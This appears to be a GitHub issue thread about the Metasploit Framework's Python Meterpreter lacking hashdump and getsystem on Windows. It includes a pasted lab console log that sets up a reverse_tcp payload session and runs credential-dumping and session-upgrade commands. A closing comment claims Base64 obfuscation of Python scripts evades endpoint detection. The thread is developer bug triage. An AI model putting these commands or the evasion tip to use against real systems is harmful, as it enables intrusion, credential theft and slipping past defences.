Feature request: python hashdump

[FilterUnfiltered]

Please add the hashdump command to the python meterpreter, thanks!

[wvu]

For what platform? Linux? Did you try post/linux/gather/hashdump?

[FilterUnfiltered]

windows, and it's not compatible

[wvu]

Did you try any of the Windows post modules for dumping hashes?

[FilterUnfiltered]

yes, not compatible. I get the following:

meterpreter > run post/windows/gather/hashdump

[!] SESSION may not be compatible with this module.
[*] Obtaining the boot key...
[-] Post failed: NoMethodError undefined method unpack' for nil:NilClass [-] Call stack: [-] /usr/share/metasploit-framework/modules/post/windows/gather/hashdump.rb:41:in run'

[wvu]

That looks like a bug.

[FilterUnfiltered]

That happens with basically everything that isn't in the python meterpreter help options... That or similar things, like the module freezing or just crashing the meterpreter shell entirely.

[wvu]

Yeah, I think it's sufficient to say post modules haven't been tested with every type of Meterpreter.

[wvu]

Well, maybe try upgrading to a native Meterpreter for the time being. sessions -u or post/multi/manage/shell_to_meterpreter.

[FilterUnfiltered]

it's not a shell it's a python meterpreter post/multi/manage/shell_to_meterpreter doesn't work and neither does sessions -u... ;(

[wvu]

I thought we fixed that so Meterpreters could upgrade themselves.

[bcoles]

@wvu-r7 we did, but it doesn't support all meterpreters. IIRC, upgrading a lame meterpreter to a real meterpreter has the same issue as sessions -u, largely due to failure to auto-detect the appropriate arch / platform. There are some other bugs with sessions -u, see: #9511

I can confirm that python meterpreter on Windows does not support hashdump and getsystem. Likewise, sessions -u will not upgrade to a native meterpreter.

msf5 exploit(multi/handler) > set payload python/meterpreter/reverse_tcp
payload => python/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 172.16.191.188:1337 
[*] Sending stage (53508 bytes) to 172.16.191.153
[*] Meterpreter session 611 opened (172.16.191.188:1337 -> 172.16.191.153:49372) at 2018-06-29 00:12:30 -0400

^C[-] Exploit failed: Interrupt 
[*] Exploit completed, but no session was created.
msf5 exploit(multi/handler) > 
msf5 exploit(multi/handler) > sessions -i 611
[*] Starting interaction with 611...

meterpreter > getuid
Server username: WIN-SGBSD5TQUTQ\user
meterpreter > getsystem
[-] Unknown command: getsystem.
meterpreter > hashdump
[-] Unknown command: hashdump.
meterpreter > sysinfo
Computer        : WIN-SGBSD5TQUTQ
OS              : Windows 7 (Build 7601, Service Pack 1)
Architecture    : x64
System Language : en_US
Meterpreter     : python/windows
meterpreter > 
Background session 611? [y/N]  

msf5 exploit(multi/handler) > 
msf5 exploit(multi/handler) > sessions -u 611
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [611]

[!] SESSION may not be compatible with this module.
[*] Upgrading session ID: 611
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 172.16.191.188:4433 
[-] Post failed: Rex::Post::Meterpreter::RequestError stdapi_sys_process_execute: Operation failed: Windows error: The system cannot find the file specified.
[-] Call stack:
[-]   /pentest/exploit/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb:163:in `execute'
[-]   /pentest/exploit/metasploit-framework/lib/msf/core/post/common.rb:89:in `cmd_exec'
[-]   /pentest/exploit/metasploit-framework/modules/post/multi/manage/shell_to_meterpreter.rb:164:in `run'
msf5 exploit(multi/handler) > 

Works as expected with a real meterpreter (windows/x64/meterpreter/reverse_tcp).

[wvu]

:'(

[Neopunkpwn]

I've been quite successful evading EPP and EDR detections with Base64 obfuscation on py scripts, but I have the exact same issue like it's been described here where upgrade to native meterpreter it's not working. You guys aware of any progress?